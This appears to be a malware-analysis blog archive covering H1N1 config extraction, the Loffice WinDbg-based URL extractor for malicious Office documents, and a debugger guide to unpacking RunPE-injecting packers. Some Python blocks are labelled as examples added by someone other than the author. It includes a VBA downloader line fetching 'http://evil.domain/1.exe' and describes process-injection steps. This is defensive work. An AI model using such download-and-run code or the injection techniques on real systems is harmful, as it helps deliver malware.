<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnXhpph0Yk3OgjlJnLVb_bWUcq6IMayyLV_BGTBWS4eCTVuvmvts6ZLyHVgZy9P5VV7sfkxMcbDsuaTax6ck2N7b2ZfE4OjH7B78Cfvy6J2XP4vEtr1EftufNYRlPmDdDQNPwStjTVQuE/s1600/load_lib_xrefs.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="190" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnXhpph0Yk3OgjlJnLVb_bWUcq6IMayyLV_BGTBWS4eCTVuvmvts6ZLyHVgZy9P5VV7sfkxMcbDsuaTax6ck2N7b2ZfE4OjH7B78Cfvy6J2XP4vEtr1EftufNYRlPmDdDQNPwStjTVQuE/s400/load_lib_xrefs.PNG" width="400" /></a></div>
<br />
<br />
<br />
One function stands out, and looking at this function in IDA reveals that there are not only a number of calls to LoadLibraryA but also calls to a function that resolves imports for each loaded module. One way to go about this would be to backtrack how execution ends up at this place; however, as the function doesn't depend on any arguments passed when it is called, it can be called directly.<br />
<br />
So after the kernel32 imports have been resolved, a new origin can be set at the first instruction of that function and it can be executed until it returns. Several modules will be loaded and their imports resolved. At this point the IAT can be dumped from memory using the same approach as earlier, which gives us a chance to make sense of the code in IDA.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjihRgwqlVaygb4oGf9OjDFfBrkPbhS6TTH1ZdirxAnclcKQ64bjNfVcqre1prsq54K56DUxL-Hw7DyLGlHfBfhvN2dSVfELr2Ndhp76ZeXIFyJ6Wj7OSjnBVJe5x503fWHKtWTxNLenFQ/s1600/imports.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjihRgwqlVaygb4oGf9OjDFfBrkPbhS6TTH1ZdirxAnclcKQ64bjNfVcqre1prsq54K56DUxL-Hw7DyLGlHfBfhvN2dSVfELr2Ndhp76ZeXIFyJ6Wj7OSjnBVJe5x503fWHKtWTxNLenFQ/s400/imports.PNG" width="146" /></a></div>
<br />
<br />
<br />
At this point there is enough to get an understanding of the execution flow and what the different functions in the payload do. After following some imports and strings I end up in a function that decodes a fairly long string, well, actually two strings. The beauty here is that the same technique used for resolving the external imports, setting a new origin, can be used to decode the strings.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgL1NQ-4KWzKTLrvfAaNcBPXfifH_ljh-HswgfxI6szdgWUpHRSArYNqQk8_i212IFYafPdVwaJnnnkZNiIXuGlNskRY4yPN3Dby17oj0lzrj9wtuCDV1iJpM2qRpWWu8HLP6dgbnJTnNI/s1600/decode-strings.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgL1NQ-4KWzKTLrvfAaNcBPXfifH_ljh-HswgfxI6szdgWUpHRSArYNqQk8_i212IFYafPdVwaJnnnkZNiIXuGlNskRY4yPN3Dby17oj0lzrj9wtuCDV1iJpM2qRpWWu8HLP6dgbnJTnNI/s400/decode-strings.PNG" width="121" /></a></div>
<br />
<br />
<br />
As VirtualAlloc allocates the memory used for decoding the strings, the allocated memory can be followed during execution, which gives not only the C2 servers but also the encryption key:<br />
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6FlKifEv5OyWwaCJup7XH0Uq7NBqaKebt9iYn_PmcckANzRVaVaLpEiIaFyktvHiya2ENqbhMKWXKsGyLTPZaWJebvdjQRUmOWr6-vFZXukvHKHQbRulOj3lwi7viAT0sOBPH2wVDCVM/s1600/conf.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="295" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6FlKifEv5OyWwaCJup7XH0Uq7NBqaKebt9iYn_PmcckANzRVaVaLpEiIaFyktvHiya2ENqbhMKWXKsGyLTPZaWJebvdjQRUmOWr6-vFZXukvHKHQbRulOj3lwi7viAT0sOBPH2wVDCVM/s320/conf.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i>The destination address of the encryption key was changed to show both in the same image.</i></td></tr>
</tbody></table>
<br />
<br />
<h4>
Summary</h4>
H1N1 presents some interesting challenges when trying to find the config, not least all the steps required to get to that point. This post is a combination of analysis findings and a hint of tricks that can be used to get a better understanding of malware that obfuscates, for example, imports and strings. When it comes to strings I highly recommend reading the article on analyzing Dridex by <a href="https://www.malwaretech.com/2016/04/lets-analyze-dridex-part-2.html">MalwareTech</a>.<br />
<br />
Again, H1N1 has been analyzed previously and the results published by Arbor; however, I wanted to shed some light on how those results could be achieved, and also on how to handle dynamic imports and process injection.<br />
<br />
Loffice - Analyzing malicious documents using WinDbg (2016-06-05)<br />
<i><b>UPDATE: </b></i>An updated version of loffice is available; details on the update are available <a href="https://thembits.blogspot.com/2016/11/loffice-gets-makeover-gives-insight.html">here</a>.<br />
<br />
I found myself analyzing a large number of malicious Office documents and Javascript "documents". And since the only thing I needed from them was the payload URL, the manual analysis had to be automated to make it more efficient.<br />
<br />
In the beginning I deobfuscated the documents by hand with some scripting included, but having seen the same type of documents over and over again I found myself just running the macro and extracting the URL from memory. Still, there was more manual work than I thought was needed, and I figured there must be a better, more controllable way.<br />
<br />
Now, the result of this isn't really a new framework or package like <a href="https://github.com/decalage2/oletools">oletools</a>; rather, I'm taking a different approach than doing analysis on the file itself, putting obfuscation out of play. This is inspired by dynamic analysis and debugging of regular malware executables.<br />
<br />
<br />
<h4>
Analysis beyond the document</h4>
VBA macros and Javascript can make use of, for example, MSXML2.XMLHTTP to interact with remote resources; this happens at a higher level compared to using the WinAPI.<br />
<br />
<code>
httpObject = CreateObject("MSXML2.XMLHTTP")<br />
httpObject.Open "GET", "http://evil.domain/1.exe", False<br />
httpObject.send()<br />
</code>
<br />
<br />
The above is very simple, but all of the magic responsible for making an actual HTTP request is done behind the scenes. One of the things that is done is breaking the URL down into its base components, such as hostname and path, before it can be used by Windows internal functions in, for example, WinInet.<br />
<br />
MSXML2.XMLHTTP is built upon URLmon, which relies on WinInet. WinInet has a function for "cracking" a URL into its base components called <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa384376(v=vs.85).aspx">InternetCrackUrl</a>. So before a URL is retrieved it needs to be cracked, which means that any obfuscation plays a much smaller role in the analysis, as the deobfuscation takes place before InternetCrackUrl is called.<br />
<br />
So rather than attacking the document at script level, we're attacking it at a lower level with a debugger. Let's look at an example of how this works in practice.<br />
<br />
WinDbg is the weapon of choice. For this example I'm using a malicious Word document from one of the Dridex campaigns. By launching Word, attaching WinDbg and setting a breakpoint on InternetCrackUrlW, it's not long before the breakpoint is hit when enabling the macro inside the document.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEin9x6oK2xaTlx2qfi_fb6D919W8N2UZvKU3obCHKJggz3hroyrIoRC_1fAdaAlW4zXMJxAuNd1ZjECiuDkmjTOTxLkFd_4nrNwuUCyoWcuAHeUBdjaC_8aS3VQ3E4d0dF90DE0Pg3Wv24/s1600/windbg-break.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEin9x6oK2xaTlx2qfi_fb6D919W8N2UZvKU3obCHKJggz3hroyrIoRC_1fAdaAlW4zXMJxAuNd1ZjECiuDkmjTOTxLkFd_4nrNwuUCyoWcuAHeUBdjaC_8aS3VQ3E4d0dF90DE0Pg3Wv24/s400/windbg-break.png" width="400" /></a></div>
<br />
<br />
With execution halted on the first instruction in InternetCrackUrlW, the parameters to the function are available on the stack, including the URL. The URL is the first argument passed and is found at ESP+4 (as I'm running on 32-bit).<br />
<br />
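The read a breakpoint handler performs at this point, as an added example that is not loffice's code: at the first instruction of a 32-bit stdcall function [ESP] holds the return address and [ESP+4] the first argument, so the handler dereferences that pointer and reads a NUL-terminated UTF-16LE string. To run without a debugger, the process memory is replaced by a constructed image holding a caller frame and the URL from the snippet above; the register values, addresses and the return-address placeholder are made up, and `crack_url` is a stand-in for the components InternetCrackUrl would fill in, used only for logging.

```python
# Added example, not loffice's code: read lpszUrl from the stack at the entry of
# InternetCrackUrlW, against a constructed memory image instead of a live process.
import struct
from urllib.parse import urlsplit


class FakeMemory:
    """Stand-in for the debugger's process memory reads: {base_address: bytes}."""
    def __init__(self, regions):
        self.regions = regions

    def read(self, addr, size):
        for base, blob in self.regions.items():
            if base <= addr < base + len(blob):
                off = addr - base
                return blob[off:off + size]
        raise ValueError(f"unmapped address {addr:#010x}")


def read_wide_string(mem, addr, max_chars=4096):
    """Read a NUL-terminated UTF-16LE string (LPCWSTR), bounded by max_chars."""
    out = bytearray()
    while len(out) < max_chars * 2:
        ch = mem.read(addr, 2)
        if len(ch) < 2 or ch == b"\0\0":
            break
        out += ch
        addr += 2
    return out.decode("utf-16-le")


def url_at_crack_url_entry(mem, esp):
    """InternetCrackUrlW(lpszUrl, dwUrlLength, dwFlags, lpUrlComponents) on
    32-bit: [ESP] is the return address, [ESP+4] lpszUrl, [ESP+8] dwUrlLength
    (0 means the string is NUL-terminated)."""
    lpsz_url = struct.unpack("<I", mem.read(esp + 4, 4))[0]
    length = struct.unpack("<I", mem.read(esp + 8, 4))[0]
    url = read_wide_string(mem, lpsz_url)
    return url if length == 0 else url[:length]


def crack_url(url):
    """Components comparable to what InternetCrackUrl fills in; enough for a log line."""
    p = urlsplit(url)
    default_port = {"http": 80, "https": 443, "ftp": 21}.get(p.scheme)
    return {
        "scheme": p.scheme,
        "host": p.hostname,
        "port": p.port or default_port,
        "path": p.path or "/",
        "query": p.query,
    }


# Constructed process image: the URL lives in a heap region, the caller's frame
# sits at ESP. Addresses and the return address are placeholders.
URL_ADDR = 0x00410000
ESP = 0x0012FF00
SAMPLE_URL = "http://evil.domain/1.exe"
MEM = FakeMemory({
    URL_ADDR: SAMPLE_URL.encode("utf-16-le") + b"\0\0",
    # return address, lpszUrl, dwUrlLength, dwFlags, lpUrlComponents
    ESP: struct.pack("<IIIII", 0x76543210, URL_ADDR, 0, 0, 0x0012FF80),
})

if __name__ == "__main__":
    url = url_at_crack_url_entry(MEM, ESP)
    print("URL:", url)
    print("components:", crack_url(url))
```

With a real debugger the two `mem.read` calls become the library's process-memory read and `esp` comes from the thread context at the breakpoint; the bounded read matters because a macro can pass a very long or unterminated buffer.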
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMijFsWqeP8CR1M5TG8UWQ9Me4VbL60Qk808XmgSWNmpt6IATlOIV_URFmeZ1Isg_9vW_vX1W31cgOMQK7a_HiWj8083mM9H1ZYBWgGZk1BO4tiUx55WqQFZHSKX7S9dF_ghXPAAs3zlg/s1600/windbg-uni.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="135" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMijFsWqeP8CR1M5TG8UWQ9Me4VbL60Qk808XmgSWNmpt6IATlOIV_URFmeZ1Isg_9vW_vX1W31cgOMQK7a_HiWj8083mM9H1ZYBWgGZk1BO4tiUx55WqQFZHSKX7S9dF_ghXPAAs3zlg/s400/windbg-uni.png" width="400" /></a></div>
<br />
<br />
So basically, without having to deobfuscate any code or upload the document to a sandbox, a URL is found pointing to an executable which can be used for further analysis.<br />
<br />
<h4>
Loffice - Lazy Office Analyzer</h4>
The beauty of WinDbg is that there is a Python module for controlling the debugger called <a href="http://winappdbg.sourceforge.net/">WinAppDbg</a>. If you haven't heard of or used it, I highly recommend looking into it; it's extremely useful.<br />
<br />
What's essentially needed is to set a breakpoint on InternetCrackUrl as soon as wininet.dll is loaded into memory, and to read the URL when the breakpoint is hit.<br />
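To show the step described above and in the WinDbg walkthrough, reading the URL argument once the breakpoint on InternetCrackUrlW fires (ESP+4 on 32-bit), here is an added Python example; it is not loffice's code. The memory and register values are a constructed snapshot, and the example also covers the x64 case (first argument in RCX) rather than only the 32-bit layout the post shows.<br />

```python
"""Recover InternetCrackUrlW's arguments at the moment a breakpoint on its
first instruction fires.

Added example, not loffice's own code. On 32-bit the return address is at
ESP and lpszUrl at ESP+4; on x64 the first four arguments are in RCX, RDX,
R8 and R9. Memory and registers come from a constructed snapshot so this
runs offline; on a live target they would come from the debugger.
"""
import struct


class MemorySnapshot:
    """Flat memory model over a few (base, bytes) regions (constructed)."""

    def __init__(self, regions):
        self.regions = regions

    def read(self, addr, size):
        for base, data in self.regions:
            if base <= addr and addr + size <= base + len(data):
                off = addr - base
                return data[off:off + size]
        raise ValueError("unmapped read at 0x%x" % addr)

    def read_pointer(self, addr, bits):
        fmt = "<I" if bits == 32 else "<Q"
        return struct.unpack(fmt, self.read(addr, bits // 8))[0]

    def read_wstring(self, addr, max_chars=2048):
        """Read a NUL-terminated UTF-16LE string (an LPCWSTR argument)."""
        out = bytearray()
        for _ in range(max_chars):
            unit = self.read(addr, 2)
            if unit == b"\x00\x00":
                break
            out += unit
            addr += 2
        return out.decode("utf-16-le", errors="replace")


# Parameter names in declaration order, per the InternetCrackUrlW prototype
CRACKURL_PARAMS = ("lpszUrl", "dwUrlLength", "dwFlags", "lpUrlComponents")


def entry_arguments(mem, regs, count):
    """Raw integer arguments 1..count as seen at a function's first instruction."""
    if regs["bits"] == 32:
        # x86 stdcall: [ESP] = return address, [ESP+4] = arg1, [ESP+8] = arg2, ...
        return [mem.read_pointer(regs["esp"] + 4 * (i + 1), 32) for i in range(count)]
    # Microsoft x64: first four in registers; the rest sit on the stack past the
    # return address and the 32-byte shadow space ([RSP+0x28] is arg5)
    reg_order = ("rcx", "rdx", "r8", "r9")
    args = [regs[r] for r in reg_order[:count]]
    for i in range(4, count):
        args.append(mem.read_pointer(regs["rsp"] + 8 + 8 * i, 64))
    return args


def crackurl_at_breakpoint(mem, regs):
    """Decode InternetCrackUrlW's arguments, including the URL string itself."""
    raw = dict(zip(CRACKURL_PARAMS, entry_arguments(mem, regs, len(CRACKURL_PARAMS))))
    # dwUrlLength == 0 means lpszUrl is NUL-terminated, which is the common case
    raw["url"] = mem.read_wstring(raw["lpszUrl"])
    return raw


def sample_x86_snapshot():
    """Constructed 32-bit snapshot: stack at 0x0018F000, URL buffer at 0x00350000."""
    url = "http://example.com/files/update.exe"  # constructed, not a real indicator
    url_addr, esp = 0x00350000, 0x0018F000
    # [return address][lpszUrl][dwUrlLength][dwFlags][lpUrlComponents]
    stack = struct.pack("<IIIII", 0x6A3F12C4, url_addr, 0, 0, 0x0018F100)
    mem = MemorySnapshot([(esp, stack), (url_addr, url.encode("utf-16-le") + b"\x00\x00")])
    return mem, {"bits": 32, "esp": esp}


def sample_x64_snapshot():
    """Constructed x64 snapshot: only the return address is on the stack."""
    url = "https://example.com/loader.exe"  # constructed, not a real indicator
    url_addr, rsp = 0x1A25C400000, 0x3F7E2FF800
    mem = MemorySnapshot([(rsp, struct.pack("<Q", 0x7FF812345678)),
                          (url_addr, url.encode("utf-16-le") + b"\x00\x00")])
    regs = {"bits": 64, "rsp": rsp, "rcx": url_addr, "rdx": 0, "r8": 0, "r9": 0x3F7E2FF900}
    return mem, regs
```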
<br />
So I wrote a utility (Loffice) that makes use of this technique. It also hooks a few other functions such as <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa363858(v=vs.85).aspx">CreateFileW</a> and <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/ms682425(v=vs.85).aspx">CreateProcessW</a>; these make it possible to extract the path a file is about to be written to, and to see whether any new processes are about to be launched.<br />
<br />
WinInet isn't the only library that macros and scripts can use to interact with a URL; there is also WinHTTP, which is covered via <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa384092(v=vs.85).aspx">WinHttpCrackUrl</a>, so both WinHTTP- and WinInet-based URL fetching are handled.<br />
<br />
To make it more dynamic, I added some options for how loffice should behave when hitting a breakpoint.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEin6OftIerpUndxwd4hJN96KWBf6J21CiixskGJ9a21lz28EMADaqH2WkIpySRLXjqhraBH2S4vyukMNnPHqyO_UcXIYiFCjtk_u8of-mCuMm9k0T8tLS8Wz629ZBGSeqgVUK1ZSAt4h0Y/s1600/loffice.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="123" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEin6OftIerpUndxwd4hJN96KWBf6J21CiixskGJ9a21lz28EMADaqH2WkIpySRLXjqhraBH2S4vyukMNnPHqyO_UcXIYiFCjtk_u8of-mCuMm9k0T8tLS8Wz629ZBGSeqgVUK1ZSAt4h0Y/s400/loffice.png" width="400" /></a></div>
<br />
Running loffice on a Word document and a Javascript "document":<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKqQ58pw3DARn_4xtWNFZtAYh0IEg3c977UjGOGdlHgRnUT9VfF5fzyZKzC2TKEaGbnUmNvjn7OMD6jYWCOQEW-OUFtgrFnwXcI5IV1JxsV0dT98qaVvZnm_b2yYk2sLbZGsglO_xF9lg/s1600/loffice-demo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKqQ58pw3DARn_4xtWNFZtAYh0IEg3c977UjGOGdlHgRnUT9VfF5fzyZKzC2TKEaGbnUmNvjn7OMD6jYWCOQEW-OUFtgrFnwXcI5IV1JxsV0dT98qaVvZnm_b2yYk2sLbZGsglO_xF9lg/s400/loffice-demo.png" width="400" /></a></div>
<br />
<br />
One thing to note is that if loffice is told to exit on the first URL extraction, it will also exit if a new process is created. This makes sure that control over execution isn't lost to another process when no URLs are found in the document.<br />
<br />
I'll look into using hooks instead of breakpoints later on, to be able to control the results of HTTP-related calls. That would give a higher chance of extracting all of the URLs in a document/script instead of only the first, which is useful when a document only moves on to the next URL if the first one fails.<br />
<br />
<h4>
Summary</h4>
So this isn't really a stand-alone tool for static analysis, but rather a utility for applying controlled dynamic analysis to documents and scripts.<br />
<br />
Rather than having to keep up with (de)obfuscation techniques, updating scripts or doing manual deobfuscation, it's possible to let the host application do all the deobfuscation and take over when the interesting stuff, such as HTTP requests, is about to happen.<br />
<br />
This does, as you might have figured out, rely on WinDbg and Microsoft Office. <strike>It is currently only supported on 32-bit systems (for now).</strike><br />
<br />
<strike>This initial version is basically a proof of concept that I will continue to work on.</strike> If you've got any thoughts/comments/suggestions, let me know.<br />
<br />
<h4>
Small update on the project</h4>
So after some time I got around to putting some more work into this. The above details the background of the project; since then I've added support for detecting and bypassing some anti-analysis via WMI, and also exiting on process creation via WMI, which should now cover the most common ways of creating processes from macros/scripts.<br />
<br />
Loffice now supports 64-bit as well. I do, however, recommend that you don't mix winappdbg and Python bitness (32/64-bit); this is a warning from the winappdbg developer.<br />
<br />
Loffice is available on <a href="https://github.com/tehsyntx/loffice">Github</a>.<br />
<br />
<h4>
Unpacking malware | Why should packers be a showstopper?</h4>
Published 2015-09-21<br />
Long time, no post... Even though lots is going on, I've had very little time to focus on a particular case, so I thought I'd leave a tip on how to unpack malware.<br />
<br />
Back in the days when I first got into malware analysis I was completely overwhelmed by all the tools and techniques one had to know about and how to apply them. Being a fast-tracker, I just wanted to dive into the deep end of the pool and learn everything as I went; little did I know how much of a showstopper this would be when it came to analyzing packed malware.<br />
<br />
This post gives an example of how to unpack many of today's samples, which are spread through both spam and drive-bys such as exploit kits. It's the kind of post that I, at least, wish I had come across while getting into malware analysis.<br />
<br />
<h4>
<b>RunPE and other injection based packers</b></h4>
<br />
RunPE is a well-documented technique for running code inside another process, so I won't go into depth on how it works.<br />
<br />
Long story short, the packer will deobfuscate/decrypt/unpack (take your pick) the malicious payload, start a new suspended process, inject the unpacked code and run it.<br />
<br />
There are some variations in how packers run the unpacked code: for example creating a remote thread, changing the thread context (<a href="https://msdn.microsoft.com/en-us/library/windows/desktop/ms680632%28v=vs.85%29.aspx">SetThreadContext</a>) and calling <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/ms685086%28v=vs.85%29.aspx">ResumeThread</a>, or hooking ZwClose. These are just some examples I've come across.<br />
<br />
The variations also extend to how the unpacked code is written to the newly created process. The most common way is calling <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/ms681674%28v=vs.85%29.aspx">WriteProcessMemory</a>, but other ways are ZwWriteVirtualMemory or <a href="http://undocumented.ntinternals.net/source/usermode/undocumented%20functions/nt%20objects/section/ntmapviewofsection.html">NtMapViewOfSection</a>.<br />
<br />
Now, which step remains to be covered? Creating the new suspended process. This is done by calling <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/ms682425%28v=vs.85%29.aspx">CreateProcess</a> with the CREATE_SUSPENDED flag.<br />
<br />
What happens behind the scenes when calling any API that launches a new process (WinExec, CreateProcess, ShellExecute, etc.) is that CreateProcessInternalW is called; it is simply the lowest-level API for creating processes.<br />
<br />
So how can this be used to unpack malware that utilizes these techniques?<br />
<br />
<h4>
<b>Unpacking using a debugger</b></h4>
Immunity/Olly have all the features needed to make unpacking easy:<br />
<ul>
<li>Breakpoints</li>
<li>Plugins (<a href="http://low-priority.appspot.com/ollydumpex/">OllyDumpEx</a>)</li>
<li>Binary Search</li>
</ul>
The majority of samples I've encountered that use injection have one thing in common: they all unpack their malicious payload before any new process is created. This means that setting a breakpoint on these process-creating functions lets the packer unpack the malicious code into memory, but breaks before any new process is created.<br />
<br />
As the malicious code is now unpacked and present in memory, it's possible to search for it using Binary Search. Binary Search supports ASCII, Unicode and hex strings, which is helpful since a PE header can be recognized by, for example, "<i>This program cannot be run in DOS mode</i>". There will be quite a few hits, as the malware itself is loaded along with all the DLLs, as seen in the sample below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVWEoS70n5RWzF1MCH5sSC9F2WJ4umPEBuJz8HEIA_2PPCIYzaLdUq7wmTNFiUN2FYm7JPiIg-bJ41dH5Rmi-DYr2okPXEmE3W-tj1jU3nrzpuLJdFrOj4_I26Fe-yhB2XS6mOF4_ODpU/s1600/memory_map.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="189" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVWEoS70n5RWzF1MCH5sSC9F2WJ4umPEBuJz8HEIA_2PPCIYzaLdUq7wmTNFiUN2FYm7JPiIg-bJ41dH5Rmi-DYr2okPXEmE3W-tj1jU3nrzpuLJdFrOj4_I26Fe-yhB2XS6mOF4_ODpU/s320/memory_map.png" width="320" /></a></div>
<br />
<br />
When there is a hit in a region that isn't associated with any module, chances are that this is the unpacked code. In the screenshot below, a breakpoint has been set on CreateProcessInternalW, which triggered the debugger to break. The memory is then searched for the presence of a PE header (Ctrl+B in the Memory pane):<br />
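Here is an added Python example, not the author's code or OllyDumpEx, of the check described above: walk the memory regions at the CreateProcessInternalW breakpoint, validate every MZ/PE header pair rather than matching a string alone, and report the hits that sit in regions backed by no module. The memory map is a constructed snapshot; on a live target the regions would come from the debugger's memory map.<br />

```python
"""Spot an unpacked PE image in memory regions that belong to no loaded module.

Added example (not from the post's author or any tool named there). It
automates the manual step in the post: after breaking on
CreateProcessInternalW, search memory for PE headers and treat hits outside
any module's range as the injected payload. Input is a constructed list of
(base, module_name_or_None, bytes) regions so it runs offline.
"""
import struct

DOS_STUB_MSG = b"This program cannot be run in DOS mode"


def parse_pe_header(data, off):
    """Validate an MZ/PE header pair at `off`; return its key fields or None."""
    if off + 0x40 > len(data) or data[off:off + 2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, off + 0x3C)[0]
    pe = off + e_lfanew
    # Sane e_lfanew: past the DOS header, not an absurdly large stub, and with
    # room for Signature + IMAGE_FILE_HEADER + the optional header up to SizeOfImage
    if e_lfanew < 0x40 or e_lfanew > 0x400 or pe + 24 + 60 > len(data):
        return None
    if data[pe:pe + 4] != b"PE\x00\x00":
        return None
    machine, nsections = struct.unpack_from("<HH", data, pe + 4)
    magic = struct.unpack_from("<H", data, pe + 24)[0]
    if magic not in (0x10B, 0x20B):  # PE32 / PE32+
        return None
    # SizeOfImage is at offset 56 of the optional header for both PE32 and PE32+;
    # it is what a dumper uses to decide how much of the region to carve
    size_of_image = struct.unpack_from("<I", data, pe + 24 + 56)[0]
    return {
        "machine": machine,
        "sections": nsections,
        "size_of_image": size_of_image,
        "dos_stub": DOS_STUB_MSG in data[off:pe],
    }


def find_pe_headers(regions):
    """Every plausible PE header in the snapshot, tagged with its region's module."""
    hits = []
    for base, module, data in regions:
        pos = data.find(b"MZ")
        while pos != -1:
            hdr = parse_pe_header(data, pos)
            if hdr is not None:
                hits.append(dict(address=base + pos, module=module, **hdr))
            pos = data.find(b"MZ", pos + 1)
    return hits


def injected_images(regions):
    """Headers in regions with no backing module: the unpacked payload candidates."""
    return [h for h in find_pe_headers(regions) if h["module"] is None]


def make_pe_stub(machine=0x14C, size_of_image=0x8000):
    """Build a minimal constructed PE header: DOS header, stub text, signature,
    IMAGE_FILE_HEADER and a zeroed optional header carrying SizeOfImage."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[0:2] = b"MZ"
    dos[0x4E:0x4E + len(DOS_STUB_MSG)] = DOS_STUB_MSG
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    file_hdr = struct.pack("<HHIIIHH", machine, 3, 0, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x20B if machine == 0x8664 else 0x10B)
    struct.pack_into("<I", opt, 56, size_of_image)
    return bytes(dos) + b"PE\x00\x00" + file_hdr + bytes(opt)


def sample_snapshot():
    """Constructed memory map: the packer module, a DLL, a heap region holding
    the unpacked payload, and a data region with a decoy 'MZ' but no PE signature."""
    heap = bytes(0x1000) + make_pe_stub() + bytes(0x200)
    decoy = bytes(0x10) + b"MZ" + bytes(0x40) + b"not a header" + bytes(0x40)
    return [
        (0x00400000, "packer.exe", make_pe_stub(size_of_image=0x5000)),
        (0x77000000, "kernel32.dll", make_pe_stub(size_of_image=0x110000)),
        (0x00350000, None, heap),
        (0x00200000, None, decoy),
    ]
```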
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmXNlJUoQfpCjXbJ0d4ey1hfrh9WDatEYWYga6co3lKQVEvTT-JmP5AsyFT6Ib-f0IfLbGMKTaM7Xd8PSonxn5msC4nbJVrN9W06KFoZsw5nhosk2EnHxMUDkgCmB-yz9i_fFctT6reVY/s1600/memory_map_header.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmXNlJUoQfpCjXbJ0d4ey1hfrh9WDatEYWYga6co3lKQVEvTT-JmP5AsyFT6Ib-f0IfLbGMKTaM7Xd8PSonxn5msC4nbJVrN9W06KFoZsw5nhosk2EnHxMUDkgCmB-yz9i_fFctT6reVY/s320/memory_map_header.png" width="320" /></a></div>
<br />
Also note that other modules such as <i>wininet</i> are now loaded which weren't there before. At this stage the PE can be extracted using the OllyDumpEx plugin, which can search a region for PE headers, automatically parse them to identify sections, and dump the PE to disk:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggLrTB65QnfVVNFc6v2F61Qk4BHwQeaIz5uwXHUvsaeUGX382zqddLsvuxPBi932_URXuYEvfrGPiZWgfvtf2YmVWfaH6pAwv5R1dCA031LLM-ZLrVSGTh_zBwEqRS9nPE_vaGEQSGXWw/s1600/ollydumpex.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="283" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggLrTB65QnfVVNFc6v2F61Qk4BHwQeaIz5uwXHUvsaeUGX382zqddLsvuxPBi932_URXuYEvfrGPiZWgfvtf2YmVWfaH6pAwv5R1dCA031LLM-ZLrVSGTh_zBwEqRS9nPE_vaGEQSGXWw/s320/ollydumpex.png" width="320" /></a></div>
<br />
That's basically all there is to it. In these very few steps, CryptoWall 3.0 has been unpacked and functions related to communication/domain generation identified:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
